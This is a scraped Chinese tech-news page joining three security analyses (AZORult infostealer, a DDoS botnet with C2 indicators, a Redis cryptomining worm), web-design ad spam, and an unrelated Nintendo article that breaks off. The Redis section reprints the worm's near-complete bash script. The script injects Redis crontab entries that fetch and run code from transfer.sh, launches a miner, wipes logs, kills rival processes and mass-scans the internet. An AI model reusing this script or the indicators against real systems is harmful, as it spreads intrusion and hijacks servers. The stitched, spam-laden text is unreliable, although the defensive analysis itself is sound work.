針對信息竊取惡意軟件AZORult的相關分析

網站內容來源http://server.it168.com/

針對信息竊取惡意軟件AZORult的相關分析

2018-05-29 14:25    來源:安全客  作者: Gal Bitensky 編輯:
0購買

  AZORult是一種信息竊取的惡意軟件,隨着時間的推移已經發展成為一種多層功能的軟件,我們知道達爾文的自然選擇進化理論已有150多年的歷史,但進化也可能由於人工選擇的結果(也稱為選擇性育種)。在我們的信息安全領域,同樣的生物學原理適用於惡意軟件的進化。攻擊者經常檢查他們攻擊性工具的具體特徵與其生存能力的相關性,並通過“基因工程”惡意軟件來改善其功能。在接下來的文章中,我們將介紹一個信息竊取惡意軟件的特性。每一層隱藏的功能的都是其“飼養者”精心挑選的,以提高其在野外生存的可能性。

  分析攻擊

  上周,我們阻止了一個客戶網站的攻擊。這是一個名為“Quotation Request – EP”的經典惡意郵件。它是從一家非洲能源公司的电子郵件帳戶發出的,它含有惡意附件。它是一個包含兩個文件的RAR存檔 – 一個文本文件和一個帶有DDE對象的Microsoft Word文檔。一旦打開,它會從受感染的網站下載一個MSI文件:

  該文件是使用名為msi2exe工具從常規可執行文件創建的安裝程序,它將“普通”惡意Windows可執行文件作為安裝程序進行包裝。這隻是眾多隱藏這段惡意代碼手段的第一層。為了獲取和分析可執行文件,我將使用7-Zip提取它,將MSI作為歸檔文件打開:

  在我們分析發現,罪魁禍首是名為Binary._D7D112F049BA1A655B5D9A1D0702DEE5的資源,這是一個包含在MSI中的正常Windows可執行文件。在使用PEStudio仔細查看文件時,我們發現情況並非如此:

  事實證明,這是一個編譯的AutoIt腳本 – 另一層包裝實際的payload。用Exe2Aut可以將其反編譯可執行文件。但是,反編譯的腳本仍然是混淆的:

  結果發現,混淆並不是太複雜,主要依賴於單個字符串混淆函數。我們寫了一個用於反混淆的Python腳本,可以點擊以下鏈接獲取:https://github.com/MinervaLabsResearch/BlogPosts/blob/master/ObfuscatedAutoItDecrypter/AutoIt_dec.py現在可以查看腳本並重命名變量:

  看看這個混淆的腳本,現在很清楚看到,在AutoIt中運用了一個經典process hollowing技術:

  惡意軟件創建原始進程的第二個暫停實例:

  它分配可寫,可執行的內存:

  該腳本將它希望執行的payload寫入遠程進程:

  在攻擊的下一階段位於遠程進程的內存之後,惡意軟件將主線程的狀態設置為運行注入的代碼並恢復進程的執行:

  注入的payload本身使用與字符串相同的例程進行混淆,因此在執行我們的反混淆腳本之後,可以直接觀察它:

  第一對字節4D和5A是ASCII字符串MZ – Windows可執行文件開頭的魔術字符串。這是一個強有力的指示,表明注入的緩衝區是另一個payload(!),並且使用另一個Python腳本轉儲它,事實證明確實如此。儘管頭部分損壞,但仍有可能使用PEstudio仔細查看二進制文件。令人驚訝的是,事實證明,攻擊者並不認為到目前為止使用的所有不同技術都已足夠,所以又用UPX壓縮了文件,使其更加隱藏:

  由於PE已損壞,因此無法自行執行,但無需這樣做。即使在UPX壓縮形式下,我們也發現了這樣一個事實的證據,即這是隱藏payload的最後一層,並沒有修復它的結構。使用十六進制編輯器觀察文件显示了多個字符串,表明其目標是竊取存儲在瀏覽器中的密碼:

  快速Google搜索驗證了這是用於竊取存儲在Google Chrome中的憑據的常見SQL查詢的一部分:

  嗅嗅惡意軟件的網絡活動證明了惡意軟件的功能,因為它首先向C2服務器發出指令,然後接收到竊取密碼的指令並將其發送回去

  在更深入的探索之後,研究團隊追蹤了一位創造幾乎相同paylaod的作者。這使我們能夠將注入的payload作為非損壞的二進制文件,驗證我們的分析結論。例如,現在我們能夠觀察到相同的SQL查詢,以提取存儲在Google Chrome中的密碼以及其他類似的技術:

  正如我們的友好惡意軟件研究社區指出的那樣,這個payload最終被證明是AZORult——一個眾所周知的竊取信息的惡意軟件,它至少從2016年開始在不同的論壇上出售。

  實踐中的人工選擇

  這個活動中包裝的AZORult惡意軟件採用了六種技術來逃避檢測,展示了它的創建者如何通過反覆嘗試和錯誤的方式選擇“繁殖”它們:

  使用RAR歸檔

  該文件在發送時作為壓縮文件存檔進行打包,試圖克服對“危險”文件類型附件的靜態掃描和限制。

  多個圖層

  使用多個圖層隱藏最終的信息竊取功能可能會欺騙一些安全產品,使其看起來不夠“deep enough”,而其他安全產品則無法理解每個圖層的上下文。

  使用MSI文件來釋放payload

  令人驚訝的是,許多機器學習防病毒解決方案忽略了這種文件類型。但是,有些供應商在後期檢測到該文件,因為二進制payload被保存到臨時文件夾中,但在其他情況下,它可能不那麼簡單並且可能會被忽略。

  AutoIt

  使用非常規腳本語言進行模糊處理和編譯,會生成一個二進制文件,與傳統的C C ++可執行文件明顯不同。在文件中尋找模式的產品本身會發現更難以檢測到惡意軟件。

  注入代碼

  這種惡意軟件會在內存中解密其有效內容,並且僅在使用了幾層迷惑技巧之後。

  DDE

  攻擊者不再依賴舊的VBA宏,而是利用了DDE的“feature” ——允許他們將有效載荷嵌入不太可疑的docx格式,因為宏只能以doc或docm格式使用。

  我們能夠追蹤之前的嘗試,從相同的參與者展示他們經過的人工選擇過程,提煉他們最新的最終倖存者。例如,早期的變體選擇了SCR擴展而不是MSI。在另一種情況下,交付機制是不同的,並且依賴於一個鏈接來直接從受損的網站下載受感染的docx文件。

  IOC

  URLs

  hxxp://ipool[.]by/bitrix/css/8/DOC71574662-QUOTATION[.]doc

  hxxp://ipool[.]by/bitrix/css/8/aksu[.]msi

  hxxp://www[.]sckm[.]Krakow[.]pl/aksu[.]msi

  hxxp://aksuperstore[.]com/fh8nzhme/gate[.]php

  Files (SHA-256)Analyzed DDE docx:

  ac342e80cbdff7680b5b7790cc799e2f05be60e241c23b95262383fd694f5a7a

  Analyzed MSI Installer:

  e7a842f67813a47bece678a1a5848b4722f737498303fafc7786de9a81d53d06

  Unzipped executable:

  717db128de25eec80523b36bfaf506f5421b0072795f518177a5e84d1dde2ef7

  Decompiled obfuscated AutoIt:

  31f807ddfc479e40d4d646ff859d05ab29848d21dee021fa7b8523d2d9de5edd

  Deobfuscated AutoIt:

  b074be8b1078c66106844b6363ff19226a6f94ce0d1d4dd55077cc30dd7819c5

  Similar DDE document downloaded directly from a compromised website:

  dc3fac021fae581bf086db6b49f698f0adc80ebe7ca7a28e80c785673065a127

  The builder (Trojanized):

  329030c400932d06642f9dbc5be71c59588f02d27d9f3823afa75df93407027b

  Similar MSI installers:

  efa6af034648f8e08098ea56445ccab1af67376ca45723735602f9bdd59e5b5d

  9d7a10fa3e5fd2250e717d359fcff881d9591e0fe17795bab7aac747e8514247

  dc3fac021fae581bf086db6b49f698f0adc80ebe7ca7a28e80c785673065a127 

網站內容來源http://safe.it168.com/

【精選推薦文章】

自行創業 缺乏曝光? 下一步"網站設計"幫您第一時間規劃公司的門面形象

網頁設計一頭霧水??該從何著手呢? 找到專業技術的網頁設計公司,幫您輕鬆架站!

評比前十大台北網頁設計台北網站設計公司知名案例作品心得分享

台北網頁設計公司這麼多,該如何挑選?? 網頁設計報價省錢懶人包"嚨底家"

一起涉及多個DDoS殭屍網絡樣本攻擊事件追蹤

網站內容來源http://server.it168.com/

一起涉及多個DDoS殭屍網絡樣本攻擊事件追蹤

2018-05-29 14:45    來源:FreeBuf.COM  作者: 任子行 編輯:
0購買

  一.背景

  近期蜜網系統監測到一起涉及利用多個殭屍木馬傳播進行DDoS攻擊的安全事件。木馬樣本涉及Windows與Linux兩個平台,通過對樣本的分析,發現這幾個樣本編寫風格都不一樣,但是硬編碼在程序中的C&C均指向同一個IP地址。推測這一系列木馬的傳播者通過購買不同的DDoS木馬進行傳播,從而構建自己的殭屍網絡進行DDoS攻擊牟利。其中有兩個樣本所屬家族為XorDDoS和ChinaZ。最後通過一系列的分析,將該威脅定性為小黑客組建殭屍網絡進行DDoS攻擊事件,同時追蹤到了惡意代碼傳播者的個人信息,包括姓名、QQ號碼、手機號、郵箱、微信等。

  二.相關樣本分析

  2.1樣本一分析:

  2.1.1樣本基本信息

  

  2.1.2樣本行為

  該樣本首先會執行安裝邏輯,包括拷貝自身到Windows目錄,然後將自身註冊為服務,最後自刪除自己,安裝完成。接着註冊為服務的木馬會開始進入功能邏輯,通過爆破局域網來感染傳播,與C&C建立通訊后,等待C&C下髮指令。

  

  2.1.3樣本詳細分析

  (1)整體邏輯

  

  (2)拷貝到Windows目錄

  生成6個字符的隨機進程名拷貝到Windows目錄

  

  (3)創建服務

  服務名:Abcdef Hijklmno Qrstuvwx Abcd

  服務描述:Abcdefgh Jklmnopqr Tuvwxya Cdefghij Lmn

  

  

  自啟動

  

  (4)自刪除

  構建“/c del C:\Users\xxx\Desktop\gy.exe > nul”參數,使用ShellExecuteExA創建刪除自身的進程。

  

  

  (5)從資源釋放hra33.dll並加載

  從資源釋放文件在文件頭加上PE文件頭兩個字節“MZ”。

  

  

  從釋放的文件更新當前木馬服務中的資源

  

(6)爆破感染局域網

  內置字典

  

  爆破成功後會拷貝自身到admin$\\、C:、D:、E:以及F:等路徑下,並創建計劃任務,2分鐘后執行。

  

  (7)遠控功能部分

  與C&C建立通訊

  

  解密出C&C地址為web.liancanmou.xyz:6006

  

  發送上線信息

  

  

  遠程下載執行

  

  更新

  

  使用iexplorer打開指定網頁

  

  卸載

  

  

  DDoS攻擊模塊

  

  

  2.1.4 關聯分析

  

  該IP對應的位置在新鄉電信機房,訪問http://123.160.10.16:3097/gy.exe下載樣本。

  通過VT Graph關聯分析該樣本早在2018-05-08已經被發現了,與本次捕獲到的樣本分析結果是一致的。

  

  2.2樣本二分析:

  2.2.1樣本基本信息

  

  2.2.2樣本行為

  該樣本代碼編寫十分簡單,獲取本地信息回傳CNC上線,等待CNC的DDoS指令。

  

  2.2.3樣本詳細分析

  (1)整體邏輯

  

  

  (2)與C2建立通訊

  創建連接套接字

  C&C地址為 jch.liancanmou.xyz:52527

  

  木馬通訊協議

  

  (3)DDoS功能

  

  並沒有用到反射放大攻擊,只是一般的flood攻擊。

  

  

  2.2.4關聯分析

  通過VT分析發現該樣本與a.lq4444.com這個域名相關,而該域名曾用於Linux/Elknot這個家族。通過VT显示,a.lq4444.com這個域名與9個樣本相關。

  

  2.3樣本三分析

  

  樣本三與樣本二代碼是一樣的,區別是樣本三被編譯為x86架構,樣本二被編譯為x64架構。

  2.4樣本四分析:

  2.4.1樣本基本信息

  

  2.4.2樣本行為

  (1)該樣本通過SSH爆破被拷貝到/tmp目錄下並開始運行

  (2)將自身註冊為服務

  (3)拷貝自身到其他目錄

  (4)設置定時任務

  (5)修改刷新iptables后,嘗試連接到遠程主機。

  (6)它會刪除/etc/resolv.conf並保存初始安裝和下載的配置數據(Config.ini)

  (7)通過發送用戶名信息連接到C&C,作為一個bot與C&C建立通訊

  (8)C&C主要發送帶目標IP地址作為參數的DDoS命令到bot機器進行DDoS攻擊

  VT行為分析:

  

  2.4.3樣本詳細分析

  寫入腳本到/etc/init.d/%s/與/etc/rc%d.d/S90%s路徑下

  

  設置定時任務

  

  控制網卡接口

  

  以.chinaz為前綴拷貝自身到/tmp/目錄下

  

  安裝完成後會重啟計算機

  

  DDoS相關的一些指紋,其中包含一個QQ號碼:2900570290

  

  

  三.事件分析

  3.1事件關聯分析

  以liancanmou.xyz這個域名為起點,結合樣本分析與VT Graph關聯分析形成以下關聯圖,可以確定123.160.10.16、180.97.220.35以及123.249.9.157這三個IP是用於作為木馬的CNC地址以及木馬分發地址。在2018年5月24日域名liancanmou.xyz從指向123.249.9.157被換位指向180.97.220.35這個IP。

  

  PassiveDNS相關信息

  

  3.2事件溯源

  3.2.1域名註冊信息

  

  3.2.2個人信息

  

  

  四.IoCs

  liancanmou.xyz

  web.liancanmou.xyz

  jch.liancanmou.xyz

  wwt.liancanmou.xyz

  wwv.liancanmou.xyz

  www.liancanmou.xyz

  http://180.97.220.35:3066/Linux4.7

  http://123.160.10.16:3097/gy.exe

  http://180.97.220.35:3066/33

  http://180.97.220.35:3066/32

  180.97.220.35

  123.249.9.157

  123.160.10.16

  123.249.9.15

  123.249.79.250

  180.97.220.35

  103.248.220.196

  892833AB52DAA816918041670519EB6351AE7EC2DB7AF2C97F3AB5EE214DA173

  4A2FB58342D549347D32E54C3DA466A19BFD66364825AC7F2257995356F09AFD

  74D4776A76AD3BCB578C9757D9F18A6ADFFE8802C43E5E59B14C4E905664733D

  DBC7FC7748BD201C54B2A0189396F3101C18127A715E480C8CB808F07137822A

,
網站內容來源http://safe.it168.com/

【精選推薦文章】

智慧手機時代的來臨,RWD網頁設計已成為網頁設計推薦首選

想知道網站建置網站改版該如何進行嗎?將由專業工程師為您規劃客製化網頁設計後台網頁設計

帶您來看台北網站建置套版網頁設計台北網站改版設計台北RWD響應式網頁設計,各種案例分享

廣告預算用在刀口上,網站設計公司幫您達到更多曝光效益

Linux Redis自動化挖礦感染蠕蟲分析及建議

網站內容來源http://server.it168.com/

Linux Redis自動化挖礦感染蠕蟲分析及建議

2018-05-30 17:06    來源:安全客  作者: 雲鼎實驗室 Fooying 編輯:
0購買

  一、 背景

  自從Redis未授權問題獲取Linux系統root權限的攻擊方法的披露后,由於其易用性,利用該問題入侵Linux服務進行挖礦、掃描等的黑客行為一直層出不窮;而在眾多利用該問題入侵服務器進行黑產行為的案例中,其中就存在一類利用該問題進行挖礦並且會利用pnscan自動掃描感染其他機器;該類攻擊一直存在,不過在近期又呈現數量增加的趨勢,在最近捕獲到多次,我們針對其做下具體的分析。

  二、 漏洞說明

  首先針對利用的漏洞做個說明,Redis 默認情況下,會綁定在 0.0.0.0:6379,在沒有利用防火牆進行屏蔽的情況下,將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。攻擊者在未授權訪問Redis的情況下利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的 ~/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器;如果Redis服務是以root權限啟動,可以利用該問題直接獲得服務器root權限。相關漏洞詳情可以參考:

  https://www.seebug.org/vuldb/ssvid-89715

  以下為漏洞利用演示(上傳不了視頻,播放地址:https://v.qq.com/x/page/u0661b9o772.html):

  經過在ZoomEye和SHODAN檢索,可以發現分別眾多Redis服務開放在公網上,這些服務都可能成為攻擊目標。

  三、 入侵分析

  經過對捕獲的事件進行分析,我們發現整個入侵流程大概是包含以下幾個環節:1、掃描開放6379端口的Linux服務器(後續感染掃描網段為1.0.0.0/16到224.255.0.0/16)

  2、通過redis-cli嘗試連接Redis並執行預置在.dat文件里的利用命令將Redis的數據文件修改為/var/spool/cron/root,然後通過在Redis中插入數據,將下載執行腳本的動作寫入crontab任務

  3、通過腳本實現以上的相關行為,完成植入並啟動挖礦程序

  4、再編譯安裝pnscan,繼續掃描感染下一個目標

  四、 腳本分析

  整個入侵利用以及後續的感染的實現,最主要的功能都是基於通過Redis問題寫入crontab任務中下載執行的NaNd腳本(https://transfer.sh/MIpIA/tmp.9kIguIhkI7)來實現的,通過對它的分析,我們基本能夠得到整個流程的所有細節,這是一個base腳本,我們通過解讀來分析下它的相關功能。

  1. sleep 1

  2. find . -maxdepth 1 -name “.mxff0” -type f -mmin +60 -delete

  3. [ -f .mxff0 ] && exit 0

  4. echo 0 > .mxff0

  這部分代碼只要是用作重複執行的判斷,將.mxff0文件作為標記文件,如果存在該文件則代表機器上已執行腳本,直接退出,否則寫.mxff0文件並進行下一步動作;

  5. trap “rm -rf .m* NaNd tmp.* .r .dat $0” EXIT

  設置預置動作,在腳本退出后刪除相關文件和腳本自身;

  6. setenforce 0 2>/dev/null

  7. echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

  8. crontab -r 2>/dev/null

  9. rm -rf /var/spool/cron 2>/dev/null

  10. grep -q 8.8.8.8 /etc/resolv.conf || echo “nameserver 8.8.8.8” >> /etc/resolv.conf

  11. rm -rf /tmp/* 2>/dev/null

  12. rm -rf /var/tmp/* 2>/dev/null

  13. rm -rf /etc/root.sh 2>/dev/null

  14. sync && echo 3 > /proc/sys/vm/drop_caches

  15. cat <<EOF> /etc/security/limits.conf

  16. * hard nofile 100000

  17. * soft nofile 100000

  18. root hard nofile 100000

  19. root soft nofile 100000

  20. * hard nproc 100000

  21. * soft nproc 100000

  22. root hard nproc 100000

  23. root soft nproc 100000

  24. EOF

  這部分主要是修改系統的配置,6、7行為關閉SELINU;

  然後清空/var/spool/cron,進而判斷系統DNS服務器是否存在8.8.8.8,沒有則添加;

  11-13則清空系統tmp目錄和刪除相關文件;

  14行清空系統緩存,而15-24則是修改系統的資源限制;

  25. iptables -I INPUT 1 -p tcp –dport 6379 -j DROP

  26. iptables -I INPUT 1 -p tcp –dport 6379 -s 127.0.0.1 -j ACCEPT

  27. ps xf | grep -v grep | grep “redis-server|nicehash|linuxs|linuxl|crawler.weibo|243/44444|cryptonight|stratum|gpg-daemon|jobs.flu.cc|nmap|cranberry|start.sh|watch.sh|krun.sh|killTop.sh|cpuminer|/60009|ssh_deny.sh|clean.sh|./over|mrx1|redisscan|ebscan|redis-cli|barad_agent|.sr0|clay|udevs|.sshd|/tmp/init” | while read pid _; do kill -9 “$pid”; done

  這裏再進一步的增加iptables限制6379端口只允許本地訪問,同時kill相關包含挖礦、redis客戶端、爬蟲等進程,這裏的目的也比較簡單,避免被其他黑客再次入侵,同時清除可能其他黑客入侵啟動的進程;

  28. rm -rf /tmp/* 2>/dev/null

  29. rm -rf /var/tmp/* 2>/dev/null

  30. echo 0 > /var/spool/mail/root

  31. echo 0 > /var/log/wtmp

  32. echo 0 > /var/log/secure

  33. echo 0 > /root/.bash_history

  清除相關登錄日誌、命令操作歷史;

  34. YUM_PACKAGE_NAME=”iptables gcc redis coreutils bash curl wget”

  35. DEB_PACKAGE_NAME=”coreutils bash build-essential make gcc redis-server redis-tools redis iptables curl”

  36. if cat /etc/*release | grep -i CentOS; then

  37. yum clean all

  38. yum install -y -q epel-release

  39. yum install -y -q $YUM_PACKAGE_NAME

  40. elif cat /etc/*release | grep -qi Red; then

  41. yum clean all

  42. yum install -y -q epel-release

  43. yum install -y -q $YUM_PACKAGE_NAME

  44. elif cat /etc/*release | grep -qi Fedora; then

  45. yum clean all

  46. yum install -y -q epel-release

  47. yum install -y -q $YUM_PACKAGE_NAME

  48. elif cat /etc/*release | grep -qi Ubuntu; then

  49. export DEBIAN_FRONTEND=noninteractive

  50. rm -rf /var/lib/apt/lists/*

  51. apt-get update -q –fix-missing

  52. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  53. elif cat /etc/*release | grep -qi Debian; then

  54. export DEBIAN_FRONTEND=noninteractive

  55. rm -rf /var/lib/apt/lists/*

  56. apt-get update –fix-missing

  57. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  58. elif cat /etc/*release | grep -qi Mint; then

  59. export DEBIAN_FRONTEND=noninteractive

  60. rm -rf /var/lib/apt/lists/*

  61. apt-get update –fix-missing

  62. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  63. elif cat /etc/*release | grep -qi Knoppix; then

  64. export DEBIAN_FRONTEND=noninteractive

  65. rm -rf /var/lib/apt/lists/*

  66. apt-get update –fix-missing

  67. for PACKAGE in $DEB_PACKAGE_NAME;do apt-get install -y -q $PACKAGE; done

  68. else

  69. exit 1

  70. fi

  71. sleep 1

  72. if ! ( [ -x /usr/local/bin/pnscan ] || [ -x /usr/bin/pnscan ] ); then

  73. curl -kLs https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12 > .x112 || wget -q -O .x112 https://codeload.github.com/ptrrkssn/pnscan/tar.gz/v1.12

  74. sleep 1

  75. [ -f .x112 ] && tar xf .x112 && cd pnscan-1.12 && make lnx && make install && cd .. && rm -rf pnscan-1.12 .x112

  76. fi

  這一長串的內容主要目的是下載並編譯安裝pnscan,從內容中我們可以看到對於不同操作系統的判斷然後安裝依賴的相關模塊,然後才是從github下載pnscan的源碼進行編譯安裝;至於為什麼採用編譯安裝的形式,猜測是出於兼容不同系統以及每次編譯生成的pnscan的MD5都不一樣,避免形成固定特徵;

  77. tname=$( mktemp )

  78. OMURL=https://transfer.sh/MIpIA/tmp.vOYTgmtZge

  79. curl -s $OMURL > $tname || wget -q -O $tname $OMURL

  80. NMURL=$( curl -s –upload-file $tname https://transfer.sh )

  81. mv $tname .gpg && chmod +x .gpg && ./.gpg && rm -rf .gpg

  這部分主要是下載挖礦程序並重命名為.gpg,增加執行權限,執行后刪除,同時重新上傳到https://transfer.sh/ 獲取新的鏈接;

  82. [ -z “$NMURL” ] && NMURL=$OMURL

  83. ncmd=$(basename $(mktemp))

  84. sed ‘s|’”$OMURL”‘|’”$NMURL”‘|g’ < NaNd > $ncmd

  85. NSURL=$( curl -s –upload-file $ncmd https://transfer.sh )

  86. echo ‘flushall’ > .dat

  87. echo ‘config set dir /var/spool/cron’ >> .dat

  88. echo ‘config set dbfilename root’ >> .dat

  89. echo ‘set Backup1 “tn*/2 * * * * curl -s ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

  90. echo ‘set Backup2 “tn*/5 * * * * wget -O NaNd ‘${NSURL}’ && bash NaNdnt”‘ >> .dat

  91. echo ‘set Backup3 “tn*/10 * * * * lynx -source ‘${NSURL}’ > NaNd && bash NaNdnt”‘ >> .dat

  92. echo ‘save’ >> .dat

  93. echo ‘config set dir /var/spool/cron/crontabs’ >> .dat

  94. echo ‘save’ >> .dat

  95. echo ‘exit’ >> .dat

  而這部分內容主要是生成新的.dat文件,包含將原來NaNd腳本里的里挖礦程序的下載地址替換為上一步上傳到https://transfer.sh/ 得到的新地址,還有Redis利用的相關語句;

  96. pnx=pnscan

  97. [ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan

  98. [ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan

  99. for x in $( seq 1 224 | sort -R ); do

  100. for y in $( seq 0 255 | sort -R ); do

  101. $pnx -t512 -R ‘6f 73 3a 4c 69 6e 75 78’ -W ‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’ $x.$y.0.0/16 6379 > .r.$x.$y.o

  102. awk ‘/Linux/ {print $1, $3}’ .r.$x.$y.o > .r.$x.$y.l

  103. while read -r h p; do

  104. cat .dat | redis-cli -h $h -p $p –raw &

  105. done < .r.$x.$y.l

  106. done

  107. done

  而步主要是調用pnscan去掃描子網段1.0.0.0/16到224.255.0.0/16中開放6379端口並且操作系統為Linux的目標,然後利用redis-cli執行.dat中的命令,進行下個目標的感染;這裏pnscan的-W參數值‘2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a’轉換后內容‘*1rn$4rnINFOrn’,是向目標Redis服務發送請求獲取Redis服務器的各種信息和統計數值,再通過-R參數值‘6f 73 3a 4c 69 6e 75 78′(轉換后內容為os:Linux)判斷是否Linux系統。

  108. echo 0 > /var/spool/mail/root 2>/dev/null

  109. echo 0 > /var/log/wtmp 2>/dev/null

  110. echo 0 > /var/log/secure 2>/dev/null

  111. echo 0 > /root/.bash_history 2>/dev/null

  112. exit 0

  最後就是收尾工作,清除相關日誌和命令執行歷史,同時在腳本退出的時候會觸髮腳本一開始用trap預置的動作,會做刪除操作,刪除相關文件和腳本自身(rm -rf m* NaNd tmp.* .r .dat $0)。

  通過對腳本的解讀,我們基本已經清楚整個蠕蟲的行為和入侵流程,也就是我們開始所描述的流程。

  另外,通過閱讀腳本,我們發現雖然整個入侵流程並不是多複雜,但腳本其實有很多”工程化”的細節考慮,不得不讓人驚嘆入侵者的”考慮周到”:

  1、 利用.mxff0文件做重複執行檢驗,避免腳本的重複執行

  2、 為了增加成功性,一些環境的預處理:

  a) 關閉SELINUX

  b) 增加8.8.8.8的DNS

  c) 清空tmp目錄

  d) 清空系統緩存

  e) 修改系統資源限制

  3、 痕迹清除

  a) 利用trap預置動作好在腳本執行完成后刪除相關文件和腳本自身

  b) 重複清除相關登錄等日誌和命令執行歷史

  4、 同行預防

  a) 利用iptables避免Redis服務開放在公網上從而導致再次被入侵

  b) 清除同行可能遺留的入侵行為,kill相關進程

  5、 系統兼容性

  a) 判斷操作系統,針對性的執行相關命令,安裝依賴包,最大限度的提高pnscan編譯安裝的成功率

  b) 關閉SELINUX,通過setenforce和修改/etc/sysconfig/selinux兩種手段實現

  c) 寫入Crontab里的下載並執行腳本的任務,通過curl、wget、lynx三種方式實現

  d) Pnscan掃描增加操作系統判斷,減少沒有必要的感染嘗試

  6、 特徵去除,存活延續

  a) Pnscan採用安裝編譯的方式,既提高在不同系統下的兼容性,也避免形成固定的MD5特徵

  b) 利用https://transfer.sh 中轉,每一次感染均生成新的連接,避免固定鏈接形成固定特徵

  c) 下載到系統的相關文件均採用隨機生成的文件名

  正是由於入侵者種種的”考慮周到”使得他的入侵感染的成功率能夠達到的一定的層度。

  五、 安全建議

  病毒清理和系統恢復

  我們主要參考腳本的相關行為進行對應的行為恢復和刪除即可:

  1、 關閉SELINUX,根據系統原環境和業務需要重新開啟SELINUX

  2、 清空了/var/spool/cron,根據原先備份清空恢復

  3、 修改/etc/resolv.conf增加DNS服務8.8.8.8,如無影響可不處理,或者刪除

  4、 修改了系統資源限制(/etc/security/limits.conf),可根據備份情況恢復

  5、 增加了對6379端口的Iptables規則,如果不影響業務,建議保留

  6、 Kill了相關進程,檢查是否包含業務所需進程,根據情況恢復

  7、 安裝了相關包,具體列表見上文,可根據情況刪除或者如無影響可保留

  8、 編譯安裝了pnscan,可刪除/usr/local/bin/pnscan

  9、 清除了相關日誌和tmp目錄,對系統無影響,可忽略

  10、 啟動了挖礦進程和pnscan掃描感染,進程:.gpg、pnscan,直接kill

  還包含了一些中間文件,雖然腳本包含相關刪除操作,但建議還是全局查找確認:.mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

  Redis服務加固

  1、 如無必要,修改bind項,不要將Redis綁定在0.0.0.0上,避免Redis服務開放在外網,可以通過iptables或者騰訊雲用戶可以通過安全組限制訪問來源

  2、 在不影響業務的情況,不要以root啟動Redis服務,同時建議修改默認的6379端口,大部分針對Redis未授權問題的入侵都是針對默認端口進行的

  3、 配置AUTH,增加密碼校驗,這樣即使開放在公網上,如果非弱口令的情況,黑客也無法訪問Redis服務進行相關操作

  4、 使用rename-command CONFIG “RENAME_CONFIG”重命名相關命令,這樣黑客即使在連接上未授權問題的Redis服務,在不知道命令的情況下只能獲取相關數據,而無法進一步利用

  六、 附錄

  IOCs

  1. 腳本 https://transfer.sh/MIpIA/tmp.9kIguIhkI7

  2. 挖礦程序 2918ee2b69bc4e6b581c7b25f08434fe

  3. 礦池域名 http://jb.chakpools.com/

  4. 相關文件名 .mxff0、.x112、.gpg、.dat、NaNd、.r.xx.xx.o/l、tmp.xxxx

  鏈接

  1. 樣本 https://www.virustotal.com/#/file/9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6

  2. Pnscan項目地址 https://github.com/ptrrkssn/pnscan

  3. 漏洞說明 https://www.seebug.org/vuldb/ssvid-89715

  4. 漏洞利用演示 https://v.qq.com/x/page/u0661b9o772.html

  5、雲鏡產品官網 https://cloud.tencent.com/product/hs

網站內容來源http://safe.it168.com/

【精選推薦文章】

如何讓商品強力曝光呢? 網頁設計公司幫您建置最吸引人的網站,提高曝光率!!

想要讓你的商品在網路上成為最夯、最多人討論的話題?

網頁設計公司推薦更多不同的設計風格,搶佔消費者視覺第一線

不管是台北網頁設計公司台中網頁設計公司,全省皆有專員為您服務

想知道最厲害的台北網頁設計公司推薦台中網頁設計公司推薦專業設計師"嚨底家"!!

任天堂聯姻騰訊,會是一樁皆大歡喜的婚事嗎?

這一步是很有意義的,也是一件好事,畢竟,一個更開放、更多元、競爭激烈的遊戲環境,才能誕生更多優秀的公司和值得掏空錢包的作品。

文/駱北

來源:刺蝟公社(ID:ciweigongshe)

經過那麼多次“狼來了”,這一次,任天堂可能真的要進入中國了。

4 月 18 日,廣東省文化和旅遊廳發布《2019 年第一季度廣東省遊戲遊藝設備內容審核通過機型機種目錄》的公示,公示名單显示,騰訊科技(深圳)有限公司申報了一款名為“Nintendo Switch 遊戲機《新超級馬力歐兄弟 U 豪華版(體驗版)》”的產品,並通過了審核。

圖片來源:廣東省文旅廳官網

  有媒體稱,此次過審的並非 NS 主機,而是《新超級馬力歐兄弟U豪華版》這款主機遊戲,但文件中明確該公示的依據是《文化部關於允許內外資企業從事遊戲遊藝設備生產和銷售的通知》,名單上的其他產品也都是遊戲硬件設備,只是均為內容單一的遊藝機,如跳舞機、投籃機,而 NS 則備註為手持類电子遊戲機。

根據以往任天堂將 NS 與遊戲新作捆綁銷售的做法,或可推測這款產品是內置了《新超級馬力歐兄弟U豪華版》這款遊戲的定製版 Switch,但截至發稿,騰訊遊戲方面並未公開回應此事。

Switch 是任天堂的明星產品,也是前任社長岩田聰主導的最後一款遊戲機,憑藉主機和掌機任意切換的一體化設計,以及《塞爾達傳說:荒野之息》等製作精良的任天堂第一方獨佔遊戲,2017 年,Switch 力壓 iPhone X,當選《時代》評選的 2017 年十大數碼產品之首。

可惜,自發售以來,中國大陸的玩家只能通過海外購買渠道,買到日版、美版或港版行貨,Switch 拿到手后,想要在任天堂線上商店 eShop 上買遊戲更是麻煩,很多人都只能通過淘寶買實體卡的方式購買遊戲,價格比線上商店貴了一大截。

任天堂不再佛系

在索尼、微軟、任天堂這三家主機遊戲服務商中,任天堂應該是最佛系的那一個,對中國大陸市場一直若即若離。

在 2014 年遊戲機禁令解除之後,索尼和微軟很快就在國內成立了合資公司,索尼互動娛樂(上海)有限公司和上海百家合信息技術發展有限公司,負責各自最新世代家用主機的銷售。

